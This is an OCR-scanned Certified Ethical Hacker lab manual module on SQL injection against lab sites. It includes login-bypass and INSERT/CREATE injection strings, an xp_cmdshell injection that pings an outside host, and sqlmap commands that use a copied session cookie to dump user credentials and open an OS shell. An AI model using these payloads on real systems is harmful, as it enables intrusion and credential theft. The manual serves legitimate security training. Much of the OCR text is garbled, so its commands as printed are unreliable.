CEH Lab Manual SQL Injection Module 15Pr pate F teaser Loci BL wrens D wastook ew Mote 15- SOL ection SQL Injection SOL. injection is @ wcbnigue ofen used to atack: a website and iti also the most canamon webs vdnercilty om the Interne Lab Scenario ‘The SQL Injection suck is performed by induding portions of SQL. statements in ‘web form entry fd in an aempe to ge the webs to passa newly formed roe ‘SQL command to the database (¢4,, dump the database coatents to the attacker) ‘SQL injection is a code injection technique cht exploits a secu vuloerbiity in 8 ‘website's softwar. This vulnerability happens when tet input is dither incotrecty Ser fr string ieralexape characters emisedded i SQI. statements oF usc inst isnot strongly typed aed unexpectedly executed, SQL commande se ths injected from the we Form into the database of an application (ke queries) to change the databace content or dump the database information lice erica or pasword the attacker SQI. injection is mostly known a a ata veswor for websites, but can be wed to anack any gpe of SQl. database, [Asan Expert Fihical Hacker, you most te diverse solutions, prepate statements with bind varables and whitcisting input vadation and escaping. Input validation can be used to detect unauthorized input before itis passed to he SQL- query. Lab Objectives ‘The objective of this lab to provide expe knowledge on SQL Tojecion attacks and other responsi thal icine + Understanding when and how web spplication connects to « drtbase server in onder 0 acces data ‘+ Btractng basic SQL Injection flaws and vuloerabiltes ‘+ Testing web applications for Blind SQL. Injection valnersbiliies 1 Scanning wch servers and analying the reports Securing information in web applications and web servers Lab Environment "To compete this lb, you will need A computer running Windows Server 2016 1 Windows Server 2012 running on virtual machine ‘+ Windows 10 running on a viewal machine Window # running on vital machine + Aweb brouser with an Insrnet connection ‘+ Administtive privileges to configure seings and mun the tools “Gata imal ate hg ance CaoMode 15-50L Wection Lab Duration "Time: 50 Minutes Overview of SQL Injection SQL. Injecta is a technique used 1 ake advantage of noo.valdated deput vulnerabilities o pass SQU. commands through a web application for execution bya backend database Biarss Lab Tasks Overview Recommended labs to asist you in SQL. Injection are: '* SQL Injection Attacks on MSSQL Database + Pesioming SQL Injen Atack asnst MSSQQL to Fxtact Daebse and \Webstellsing Samar 1+ “Tesi for SQ: Ineon wing WM Security APpSean Tool 1+ Scansng We Applasons using M-Sat Lab Analysis Analyze and document the results rated to this ab exercise. Provide your opinion ‘on your target's security posture and expose. PLEASE TALK 70 YOUR INSTRUCTOR IF YOU HAVE QUESTIONS “Gitta Mena ye —~C~C~C*~*~*~*S*SCSCSTSCR Gee a “itis peat Sey RoeModule 5-80 Wection SQL Injection Attacks on MSSQL Database SQL Iyjecsion i a base tac wae ther to gain mnastbriced aes to database er 0 rei information diel fram it Lab Scenario “Today, SQL Injection s one ofthe most common and pelos stacks that website's —tizase software experience. This tack is performad on SQL. databases that have weak F tore codes and this vulnerability ean be used by an atacker vo execute database queries © Louie __ eller seasive information, modify the database enres or tach a malicious code i webeuse ting in total compromise ofthe mest senstive data [DD wostokeaiw Asa Expert Penetration Testerand Security Administtr, you need wo tert web SERENE plications nning on the MS SQL. Server database for vnersbies and flaws Lab Objectives “The objective ofthis ab sto provide stents with expert knee on SQ, Injecion auacks and to analyze web applications for valent. In his ab, you wllars how to: + Logon without vali credentials Test for SQL Injection Gomantntedin (Ale OUF OWN USEF aecoUnE ‘this ab aro Create your own database ems Directory listing + Enforce Denial of Service attacks Gia Named Tar mene pO aLogon without ‘vata Credentat Zn sepa si Mode 15-5 ection Lab Environment ‘Tocomplt this lab, you wil need: A computer running Window Server 2016 (Vietim Machine) + A-computer running Window Server 2012 (Attacker Machine) "The MS SQL Server must be ning under local system privileges + A webbrowser with an Intinet connection Lab Duration ‘Time: 15 Minutes Overview of SQL Injection Attacks QU. Injection sa basic atackused either to gain unauthorized access toa database for to fetteve information dlrecly from the database. It is a flaw in wed applications and aot a database or webserver issue. Most programmers are sill fotawate of this deat. Lab Tasks Blind SQL Injection is used when a we application i vulnerable to an SQL. injection but the results of the injection are not visible to the atacker. ‘Blind SQI. Injection i dential to normal SQL. Injection, except that, when an atacker attempts to exploit an application, rather than secing a useful error message, a generic custom page displays In this eb, the machine hosting the website i the vivim machine (Le, windows Sorvor 2046); and cie machine used o perform SQL Injection ausckis Windows Server 2012 machine. |. Before taming this ub make sure that yuuhave lagged into Windows Server 2016 aod Windows Server 2012, 2. In Windows Server 2012 machine Taunch a web browses, ype ttpsiwev.goodshopping-com inthe address bar, and press Enter. In this kb we are using chrome web browser Ifyou are ting any other browser then screenshots wll vary in your ab environment 3. "The goodshoppingghome page appears as shown inthe secenshowe “Cab anal Psize SSS ing ad Cai ir hyMote 18- SOL nection 4 Assume that you ae new this se and have ever registered with it Now dick Loom, Ce Sevier rs ‘eerste 5. “Type the query Ma or t=4-~ in the Username Fld fas your login nam), and leave the password fd empty. 6. Glick tog in. GRE 2 en tl 1. Youarclogged int the website with a fake login, Though your credentials sae not valld, Now you can browse alle ste's pages es regicered member. 8. Afierbrowsig the si; dick Legout.Doggett ae. Aras ode 15-50 tection 9. You have succesfully logged out ofthe vulnerable site, and close the web ner 10, Before performing the next ask ic, Crenting a User Aeconot with the SQL. Injeedon quey, fst let us confim with the Login database of GoodShopping. 11, Switchto Windows Server 2016 machine and navigue to Start > Microsoft SQL Server Tools 47 20d click Microsoft SOL Server Management 12, Microsoft Ql. Server Management Sudo window appears with Connect Server pop-up, choose Windows Authentication inthe Authentication eld snd cic Connect. SQL Server = GUE Coma Se 13, microsoft SaL Server Management Studio window appears as shown in ‘he screenshot. In the le pane of Object Explorer cxpard Databases > Goodshopping > Tables, In Tables rightclick abe-Logim and click ‘Select Top 1000 Rows {rom the context mens to view the avalable GUE 15 Webneage e "eal hated Gans Cah EE am ‘iM hapeactons acts PteMode 15-S0L Wection 14, As you can se inthe database we have ony one entry, smith and samitnt23, GLH LoL dea BL tA8K 2 15, Switch back to Windows Server 2012 machine, and launch a browser and ‘Greate Your Own ‘ype httsiwa.goodshopping.com in the adress bar ofthe browse and ‘User Account [res Enter, The GOOD SHOPPING home page appears, as shown i the ‘excenshor 16, Cick LOGIN, and ype the query BlaKsimert into login values ‘Gorm’ apptet23);~ i the Userame Fi (4 your login name), and eave the password ld empty 2 shown inthe seeerchoe 17, Gick tog in. D roseassos TROURE Cena sna SESSA 18. Ifo error message is dispbyed, it means that you have successfully created, Ekooore your login using an SQL injection query. “Gitta Menai ye —~—~C~*~*~*~*S*SCSTSC Cass Mn Repay teHepes Sarees Dents te Someone tee 3 nnn ‘FTA Maal Pe Mott 15. SOL nection 19, Afierexccuting the query, to very whether your login has been ereted successfully, click LOGIN tab, enter Joh in the Usermame field and apple 123 in the Password field, and cick Log im GR agg wee 20, You will ton succesflly with the created login. Now youcan access all the features of the website. 21, Gi Logout ater browsing the seed pages, and close the browser window coop SHOPPING 22, Switch back to the Windows Server 2016 virtual machine. 23, Right-click dbe.Login, and click Select Top 1000 Rows fiom thecantext| GURL Seeing Tp 0 Ree ‘iia Hang nd Gomme Cori Oy Em Tapped upmctons td RoanMotte 15-50 fection 24, Observe thatthe usemame sn password have een saceessfilly added wo the goodsbopping datbase, 25, Note down the avaiable databases and then close the SQl. Sener sony acme ‘Soin emtweypeoe Trask > 27. Jawuch the browses, ype httpewww.goodshopping.com in the siress ay ‘ar, and pres Enter, ‘Create Your Own Debees: 28, ‘The Home Page of GOOD SHOPPING appeats 29, Gick LOGIN, type blahjereate database mydatabase; - in the Usomame field, eave the Paseword field empty, and cick Login. 30. In the above query, mydatabase isthe name ofthe dtabase. Aryan Sretesrgemich 31, Ifaoctor message (or any mess) iapay onthe web pape itmeans that phe the seis vulnerable w SQL injection: 2 database with the rame mydatabase Jas been created atthe ditabase server. Close the browser. 32, Switch back to Windows Server 2016 vietim machine and lasoch dhe SQ. Server Management Stadio and loge. “Gartak tana pew —~SCSCSC*S*S*S*SCSCSTSC ga a COM Mini Rowwer tpmctons Sey PoeMod 15-SOL mection 27 rmetsuoues 38. The Microsoft SOL Server Management Studio min window spears a8 ori en shown in the sereesshon Sctene st pee 34, Bspand the Databases nove. Anew dasbase has been crated with the 25 Chet teen 80 bre egret ee wns 4 Schack oman tare 24 ae TEETEEE Te” 27. Launch the web browses, ype mttpetwww.pootaneppng.com in the Tesora Semele Wats Theos geet COOD SHOPPING pe 39. Glick LOGIN, ype blamyexse _mastor.anp_emashell “ping ‘swwwcertifedhacker.com 4 65000 + in the Usemame fe, leave the Password fc empty, and click Log in. D veserahionn ‘Pike ep 40. In the above query, you are performing a ping for the ‘www.cortifedhacker.com website using an SQL Injection query 4 is ‘the sen buf size, and refers to pinging the specified host. Ca baw oioa Hany an Gunman Cri 6) “hippeckoweel upetons sy entoie maniac Seite ‘Site ene) Syren ‘Ca ab Maa Pas ode 18-SOL oc 41. ‘The SQL. injetion query starts pinging the hos, and the login page shows a Waiting for wew.goodshopping.com.. message atthe bottom of the FIGURE 1:5 eon uy onsite 42, Tosee whether the query has saceesflly executed, switch back co Windows. Server 2016. 48, Launch Task Manager, 4 In Task Marager, under the Detail tab, you see a proces ealled PINGLEXE. sunningin the background. Tiel and Garena Cai Miki corel gcse acs MatMote 15- SOL ection 45, This proces isthe route ofthe SQL ejeson query that yo emer in the login fed ofthe web site 2 WanDE. woo atope Lee feetene Ee. paeseesaccesscsassesad i a Magen epee 46, To manually kl his process, right-click PING.EXE, and cick End Process. ‘This stops/prevents the website from pinging the host Lab Analysis Analyze and document the ess related to this ab exereise, Provide your opinion ‘of your targets seeuiy posture and exposure, PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS No Ditabs “Gai takamar as? ——SS*S*~*S*S*S*« i rm Ca KE “Eiko pesto ney beP oxyour ole Bl vieomis D wanton view > Toole ‘his ab are avilable at ‘TooteceHvI0 Module 15 Sat, Performing SQL Injection Attack against MSSQL to Extract Databases and WebShell using SQLMAP SQLMAP is an chon sour pencratio tating tool that andomates the proass of detecting and expliting SOL. injection flaws and taking over of database serves Lab Scenario SQL, inction is a technique used 10 take advantage of un-szitized input vyulnenbilies to piss SQL commands trough a web application for exeeuion by & backend database. SQl.injeeson is a basie stack used to citer gain ‘unauthorized access to a database or to retteve information direey from the Gatabace. It isa fawin web applications and nota datbase ot web server eso. ind Deserts “The objective ofthis lb i to help sudents lea how to perform a SQIL injection attack and exact dtaboses Lab Environment “Toscomplete this lab, you will noe = Windows Server 2016 (Vicim Machine) ‘= Kali Linux machine (Atacker Machioe) Ron this lab on Kal Linux machine "Make sue that Windows Server 2016 machines running + Aweb browser wih loternet access = Microsoft NET Framework Venion 40 o aterMott 15-50 fection Lab Duration ‘Tine: 10 Mites Overview of Testing Web Applications Web applications are tester for implementing secutity and automating vulnerability ssieaments, Doing to preven SOI. injection attacks on web servers and web applications. Websites are tested for embedded malware and by employing multiple Lab Tasks eT 1, Togo wo Kali Tix machine with Usemame roe and Password: tor Login to 2 Before string this mb assume that you are registered a user on the Movioscope epitww.moviescope.com website And you want to crack the passwords ‘ofthe other exes from the dtabase ofthe movixcope. 3. Oper a web browser and login ino the nephew movieseope.com 15 [Uscemme: sam snd Password eata23 4. Once youare logged into the website cick Wlew Profle ab, ard make a note ofthe URL in the addres ba of the browser ight-tick anywhere on the webpape and click Inspect Element (@) ro the context menu 2s shown inthe sercensbot Cia Moa ‘ial Hains Gomcnarns Goi Ov Em ‘itu terl apn hash oteMis 18-80 ection 6, Developer Tool sation appears as shown in the semensbot, dick Console {ab and spe document.cookie in die lower eft comner ofthe browne and pres nto, 7. Select the eookde value and rightclick and Gopy the valu as shown inthe screenshot Minimize the web browser. Noto: Cookie valve may diferin your lb enviroment.Moe 18-80 hietion 8. Cick Terminal icon fom the taskbar to launch as shown i the seeenshoe. 9. “Type saimap “httpshwww.moviescope-comviewprofil.aspx id=" — ‘cookie= bs and res tor. 10, By suing the above query, selmap enforoesvasiousinjesion reehiques on te name parameter of the URI. in an atempe to extract the databace information of movieseope website EER ae ad ‘SQL map retrieves the databases present MS SQL Server. It sso displays inematon about the web sever operaing system, web application technology and the back-end DBMS as shown inthe sereenshor 4", 20: en Seerodo 15-0 hiecton 12. Now, you need to chooge a daubaceand use vmap to retieve the tables in the datahese. In this lb, we are going m determine the ables sesnciated with moviecope database, Now type sqlmap st “httpihwww.moviescope.comiviewprofile aspx?ide1” cooklenctcookle value which you have coplod in stop #7" -D moviescope tables ard res nto. By sung the above query, slap stares searing the ‘moviescope cts in sate of tables locate inthe database RRRET RE eae 13, slmap reeves thetable contents ofthe mevioseopedatabase snd displays 114 Now, you eed to retrieve the cohums associated with the bles. In this lub, you wl we salmap to retieve she columns ofthe table med "User Login, For extracting oiumns information, you need 0 ise the following salnap query aqlmap-s “nttputww.movioscope.com/viewprofileaspx?id=1" -cooklo=<'eookle value which you have coplod in stop #7">-D moviescope-T Usor Login columns, By isang the above query sskmap stars seanning the UUser_Login able inside movescope database in search oF elsMod 15. SOL nection 15, soap revieved the availble columns in the above mentioned ble ie, User Login as shown inthe serenshor. 16, Now ype saimap <1 “httpelwwew movies cope.comiviow profile aspxTHi=1"-cooklo=<"cookie value wich you have copied in stop #77>-D movlescope-T User Login “ump 20d press Enter co dump the all User_Logio able content SREMt 15-SOL nection 17. Now the samp has tetsved the comple database of the moviesope which contains the Username and Passwords of the users as shown in the 18, To verify the login details are vai, you can login with the exacted login exis oF any ofthe wer, Before that cose the Developer Tools console snd logout fom the previo session in the browser and then login in his lab we ar loging in with the wer steve ad passwd i tose 19, Asyou se inthe below sercenshot we have sucessfully logged into the ‘mowviexope website with steve's account. ‘Tab Maal Pas lag nos (Sy makModule 18-804 tection 20, Now type aetap “nttpulwwamovioscope.comiviowprofile.aspxtli=1” -cookle=<"cookio value which you have copied in stop #7> ~oe-ehell and pss Enter ail 21, slnap tres to optimize value for DBMS deay responses message appears pe ¥ and pres Enter to continaeMod 15. SOL nection 22, Once sulmap acuizes the pemisson to optimize the mache, twill gives yourwiththe shell Type mostname and press Enter 0 find the machine ‘ame where the site is runing. HCL oman commli ap 23, Do you want wo rareve the commend starr’ ouput? message appears ‘ype ¥and press Enter.Module 5-SOL nection 24, ‘Thus sglnap will reuives the hosaname a shown in the screashot. Motes Ho you want o ettive the command standard output? message sppens type and press Enter. 25, “Type peontig and press Enter to know the IP coafiguration the machine. |Lab Analysis Ale aod dociment the ress reled otis kb exercise, Provide your opicion Apoyo ay pom eod poem PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS Yes No Platform Supported Classroom Bilabs GL Men ‘iia Haig in Gunes Coy OH me Mitac kameee pesos Sc stPvaubie F oxyout Zvwcnige B wireerie D wastenk vie ode 15- S04 tfecton Testing for SQL Injection using IBM Security AppScan Tool ‘The IBM Serity AppScan is a eb appaton sear testing tol that eomates ulnerabilty asessmnts, prevents SOL, injection aiacs on websites, and sans web sites or embeded madara Lab Scenario By now, you must be familie with the ypes of SQL. injection atucks an aracker can perform and the impact caused by these atticks. Auackers can use the following types of SQL. Injection attacks: Authentication Bypass, Information Disclosure, Compromised Data Integrity, Compromised Availabilty of Data nd [Remote Code Execution which allows them to spoof identi, damage existing deta, execute systemlevel commands to cause 2 denial of service of the pplication, and so on. In the previous lab, you have already learned to test SQL. jection Atacks on [MS SQL Database for website vulnerabilities, ‘As an ompsnization’s Expert Seauiy Professional and Peneumtion Tester, your jb responsibil isto test the compery’s web applications and web services for vulaerabiites. You need to find vatious ways to extend security test and analyze ‘web applications and employ multiple texting techniques, ‘Moving further, in this lab, you will eam to test for SQIL Injection atacks using, TBM Security AppScan, 2 Toole Lab Objectives ‘demonstrated In ‘hi Ib are ‘The objective ofthis lb is to hap students earn bow to ext web applications for ‘avaiable 226EH- SQL Injecon treats and wolerabiis, ToswleEM® this hb, you wil arn Injection * Pefom we site sans fr vulnerabilities Analyze scanned results * Generte repoms for scanned web applications ‘GaN ab Mea Pw Tic isdn nd Gomes apr “aah marel posses erDron cndrriat Mp foweulse Disnent smi Draen + natal ana configure 1am Security AppScan Mot 15-0 heton Lab Environment “Toscomplet this lab, you wll noc "= TBM Scoutiy AppScan located at ZACEM-TooIsICEHVIO Module 45 SQL Inoction'SQL Injection Detection TooIslBM Security AppScan = A computer mnning Window Server 2016 You can also download the latest version of Security AppScan from the link httpttww.04.ibm.comisoftwaretawdtools/appecanistandard = Avwebbrowner with ltemet access 4 Microsoft NET Framework Version 40 ter Lab Duration “Time: 15 Mines Overview of Testing Web Applications ‘Web appicaons ae tex for implementing ecu and atamating vuloerbiy assesment, Doing to prevents SQ injection starts on web eevee and web spcaone, Websis ate ised for cnbdded malware and to employ mule ‘ening echnigcs. Lab Tasks 1. Navigate to G8 TooklCEHV10 Module 15 SOL nectonSAL Injection Detection ToolsilBM Security AppSean and double-ck ‘AopScan Std_.0:3.6 Eval Winexe, 2. Wan Open File- Security Waming pop-up appears lice Rum, 3. Follow wizard driven installation stepe and inetal the IBM Security AppScan tool. 4. Takes atound 5 minutes to complet the installation process. ‘Note: Acthe ime ofinsallaion, a Web Services Component Download dal: boxappedrs asking you to dawnload an additional eemponent. lick We to avoul thedownload.Mod 15. SOL nection 5, Launch the 19M Security AppSean zoplication fiom the Appe lst of Windows Servor 2016, 6, The main window of 15M Securty AppScan appears, click on Greate New ‘Sean. to epi scanning snModule 15-50 ection 7. AlNew Sean pop-up apes clic on demetestire.net ink, ‘Note: ln evaluation version we cnet scan other websies. Predefined Templates 2) Regutor sean eaaom. Beware uo scan Dreeme scien weber cones Dweseere Deedes (Bixee, SD racee tom cate wens seas wench [8 The Sean Configuration Wizard srpears select AppScan (automatically or manually) an click Next eae Cation wat Droweat teapiin See hee of ety cnc aienten ‘CTT Maal Pas "Bia Hag Goes Coy FO ‘Eigiehocrel peas sa PeaMoat 15-SaL Wection 9. Under URL and Sorvor,lesve the default options an cick Next Crees Sa = Pnaetwoe —— GUNES IM easy een Sa som Wa 10. Uner Login Management, selec: Automatic nd enter he usemame smith sand password Demot234 aod cick Next. irre ie ire GLAS MMS Sen. San Cnn Gaba as Tia igen Comarca Co Oh Mhtgie oct Repco eeSL ection 11, Under Test Poly, lave the default options and cick Womt, tae fe z ioe <= RS aan pe ney in 12. Under Complete, verify that Start afull automatic sean islet, and click Finish wo complete te Sean Configuration. D ret adn in Serer, ‘Moto ‘gine ee ‘Redes dape GLE SN Raa papa “Cartaatead psig ——~SCSCS~*~*~*SCSCS*C Haga Con Oy Ee TEmgSKoeeel upwactons Sy RaoModule 15-50 ection 13, An Auto Save dialog hox promprs you to save automaticaly during seam, ick Yos to save the fle and proceed. Tao ca ‘Tegernrennteedrotee fexScn iat Auta ae sigs hee ee amv sean ‘Gat Ne aa haat sve eg scar i ck Dan teal ‘ wk ‘Morea oct a ne scans 14, "The Save As window appears; navigue to the location where you would ve the sean, specify amame frit, and click Save. > tore neice nie 2 netoaton et hme oe eid op te ue fee 5 Serer [mare Egemeee tee tems yours Ponto srpimasaiomer panne 7 eee ee Rcures meee | nee SEES | Dict “ish iawred pms ey HeesModule 5-80 Wection 15, The IBM Security AppScan sarts seanning the provided UR. GUNS Rr Sensei Ne ae mon 16, The Sean Expert Recommendations pune opens click tgnore AM in the FIGURES aed pp via an “Gautam ease ——~SS*S*S:CW ad Gees Cr “Thien pessoadle 15-5 ection 17. An Appsean pop-up appears click Yes, appscan © re serene ten et nomi Dotan 18 AppScanbagins to san for website aloes, Yeon Seba ect ‘Sie sees. RGURESIA WS Note Ie wl te lo of ime to sean the complete site Citak anal eT iia KeretaMout 15-SOL nection 19, After the completion of seamning, he application ls all he security sues and vuleeabltes thas foand, 20, Remults canbe displayed inthe views: ata, tates and Task, 21, To view the vulnerable and security issues found lick Issues, (iy Bn 5 jection TRCURE MI MM Raed gn Say Eh Aan ea br TEE analyze the sean rests, ick on any ofthe rem such as SL Ioction, Bes and exptid the noes tos ll the links that ae vulnerable to SQL Injection. Analyze Result 24, You can fod explanation regarding the slcetel lnk in the rght pune of che GUI, under tssve Information. RGURE 16 Pet on Sera plat eat aon Cy "Bilal ning nd Coen Cops Em Ti Rowee apwantonn ty RoeMod 15-504 Heaton 24, Click Advisory ia inthe tight pane ofthe window to see the seventy of that articular lnk, 2s well asthe description of the hear. Dine serge tenon RT etree perepennel Hwee ong areas Silene ite RGU Nae a pen 25, Click Foe Recommendation «9 seck some advice for fixng thes vulnerabilities. Dre kates Cg ope aeen Eason eraser Siieckacen oneMode 18: SOL mection 26, AfierAppScan sete your dct wna, youcan genre cutie Duar report conte forthe asc in your umpaion. ‘GenaratoRopert 27, Yeu can open and view the repos fom within Seat Appcan and you ca anve a ropertin any ote! format tat an be opened wih hp ‘ppliation. 28, ‘To generte a repo, click on Tools Greato Report ‘The Groato Report ‘window appears Din. ny Sonik nce cea sete ent ace NER pn gen i 29, Select the rype of eportio generate, check options an click Save Report. 2 at pn i Dove seme me om Se Neeeernmm Sane ociep > Bom > bonne > dma > mer > ates 31, ‘The seved port wil be helpal for fare reference. Lab Analysis ‘Azalps ae document the rere to this nb exerci Provide our opinon ‘fara seciny pene and expen. PLEASE TALE TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS Yes CONe Platform Supported Classroom Ditabs “Gua Monat sh ——SSCS*S*S*S*C ad Ge CyB “Eien epcbenoes or eeeMotu 18- SOL nection Scanning Web Applications using N-Stalker Tool N Stalker 2012 is a sophisticated web security assexoment soliton for your web pplication. By incrporaig its well-known ‘N-Steat HTTP Sec Secner” and its 39,000-itom Web Attack Signatere database, alongwith its patent pending componentrinted sect asexmet taba, NoStaller it “rst ate” security ‘a or declepers system | earty adnate IT auditors, and others. Lab Scenario Few amackers perform $QI. injection tacks based on “err messages” reesived frorn serves. If an error is responded to by the application, the attacker can {determine the database's entre structure, and read any value that can be read by the account the ASP application is using to connect tothe SQUL server. However, if an error message is retuned fom the database server stating that the SQL. (Query’s syntax is incorrect, an atacker ties all possible tme/false questions via SQL statements to steal data ‘As an Expert Secuity Professional and Penetration Tester, you should be friar with the tips and tricks used in SQI- injection detection. You must also be aware fall the tools that ean be wsed to detect SQI. injection Haws. In this lb, you will learn todo 90 using N-Stalker. Lab Objectives “The objective ofthis lb i to help stodens lenen how wo test web applications for QI. injeson dea and valoerbiies. Inthis Ib, yo wl ea Peso wa site seans for vulnerabilities Analyze scanned results Save Sean Results o> Manca Pye ie aig a Gomes SHADirsrdapn te 13 meng Bras Install Stalker Geis Med Pe Tic sigan Oommen Cap Modul 15-80 hfeton Lab Environment “Tocomplet this lab, you wll ned 1 N Salle locatal st ZACEM-ToolICEHV10 Module 15 SOL Injection'SOL, Injection Detection Tools Stalker Web Application Security Scanner Run this tool in Windows Server 2016 * You can also dounload the latest version of N-Stalker from the link ttpadwww nstalker-comiproductsieditionstveeidownload! 1 you download the latest version ofthe tool thea screenshots will vary A webbrowser with Itemet access Microsoft NET Framework Version 40 o lee Lab Duration Tine: 10 Mites Overview of Testing Web Applications ‘Web appiaons ae tse for implementing seen and asorating vlneabiy ‘asessmenss, Doing so prevents SQL injection amacks on web servers and web fpleations Websles ares for embertel malware and by employing mule eatin Lab Tasks 1. Navigate ZACH TooliCEHV10 Module 15 SQL InjectioriSOL Injection Detection ToolsiN-Statker Web Application Security Scanner, double- click NStakor-WebSecurtyScanner-Freex34.oxe, and fallow the sips to nwa he application. 2 Once the insallaon is completed ensure that Run N-Staller Web Applicaion Secuity Scanner option is checked and uncheck Show Readme sil then cick nigh Stalker apiction launche’ automaModule 15-504 Wection 3. Alterativay, you can also lunch the sppicaton fim Start > W-takor ‘Web Application Secunty an click MStatker Free x cr double-click shor ‘cot ion ofthe NStatkor Free X fom the Desktop. BY We Statar Web Rppcnton Secu Sanne TOHd rece” ¥ N-Stalker (coeepletng the ee Web hetateeCunca Application Security Scanner Setup Wizard "taker Web Agsaton Seay Snr hasbeen ‘aed ene centr Tn tae i Aoki ect Saree Free Edition [Lisrenseasn| Bnsestnae eae Saraerioes se oa patty aooes GL Winker Soe ere 4. The N Saker GU appears click Update to update the application. Dieaseeiy Ines ee 85 Spear wat Sette ry (tesa pendaly soon “Gaim ee —~—S*S*~*SCSCS*C gad Gomi oa ym “Firion apmsnesons cy ae5, The NStalker Free Edition pop-up appears click OX to continue ‘Star Updates limited in Fee Eon aed willbe provides ASI wtheut ony guuartee Fer more infrmation Shout cur Commercial ation please, contact us E-mail sales@taercom one o55-11-3675 To (GMT-2200) 6. NStatker will sartupdating the database, which takes some tine. Dre wersuter Bens aa ait a bese “Pen in aerate ‘Setbee/setae pes ROLE en pan “Ceittaatew Peas —~—~SCSCS*C*~*~*S*SCSCS:C gad ame Co Oy A MEnpaaweed upactoes as eaModule 15-504 Wection 7. Alter updating is complete, click Start to starta new seaning session. 12) v0 apy eee aie IG Case tae en 8 Inthe N-Sulher Scan Wizard, enter httpdiwwrw goodshopping.com. Denote 9. Choose the Scan Policy OWASP Policy, and click Next. cmc CURA ier ang aR “Gatitimal hota Ciaing ad Common a iy "iRise hoot upmickons bee RootDxsurseee niet apes reeiepen seem Degterarey Laie Forage ‘ecmomire fester Kova acing Sescaret ore ma ata Maal Psa Module 15-50 ection 10, Under Optimize Settings, lave the default options, and click Wext pony Senge OE? hep 11, Glick Yes inthe Settings Not Optimized popup. ing NetOp ‘ou have optimized your scan catings yet pte song tocando todo a Do youwantto continue anyway? == Tica nding wd Comcememnn Cp OE Ti RGbv kero Tepictons dy eaeD pavssany cmon senna re en Cae SSnicccedeme Paci tacarnemeet ea ale ete: 12 yweaen nar ste cad NGA? Site Rens 13. The MeBtalher tee etion pop-up appears click K to comtinee Saker Fee Eon QD nisiawersone ae stalker Free Eston hae remicionte colony thefert fear 500 pages within the same scan session, For more nfermation Soe ‘tole Commer in ps cota oe snr i eee Seana Ema clrOnaatercom Phone 1515155 (MT-0) el Tica tgs Goer Capo EE SEH TaD Mal Pa ‘ii tacat Ron's Sch) MeModul 15-50 ection 114, After completing the configuration of N Stale, click Start Sean to begin ED che Hcg Reese. a 15, N Stalker begins to sean the website as show inthe sreenshoe “Gitttaehanal gel ——~SSCS*~*~*:*« ig me CahMote 18- SOL ection 16, leaks some dine For the application to sean the enti website 17. NiStalker scans the stein four diferent eps: Splder, info Gather, Run Modules, and Sig Scanner. D scm ae Sewer D saeeninion 18 On completion ofthe scan, the Results Wieard appears. Tryate a 19 Select Save scan results (ander Session Management Options) ac Keep —— ‘scan session for turther analysis (ander Next Steps), ae click Mext 1D seserliatoen ‘Salut opereat sor “Geittaient ie ——~SCSCS*~*~*SCSCSSC ig is Ca Oy HON Tipsstooe epeactons tee eetMote 15-50 nection 20, N:Sualker displays 2 summary of vulnerabilities found, Aer examining the summary, click Done. Biniasie aa as = Dense ‘ICURLAISN Sater ay Tilia Haig od Gaerne Cori Oh a ‘Ca aaa eT Wigeowead Rye PeMott 15-SOL nection 22. You ean view the complete sca results jn NStalker's main dashboard 23, You can even expand the URL. nttpytwww.goodshopping.com (ander ‘Vulnerabities) 0 view ll he site's vulnerable. Sant Eton 24, On competion ofthis lab close the N Stalker GUL, Lab Analysis Analyze and document the resus red to his kb exercise. Provide your opinion ‘of your urges seu posture aed exposure. PLEASE TALE 70 YOUR INSTRUCTOR If You HAVE QUESTIONS ‘Gab Maral Mian pmctons Seer aac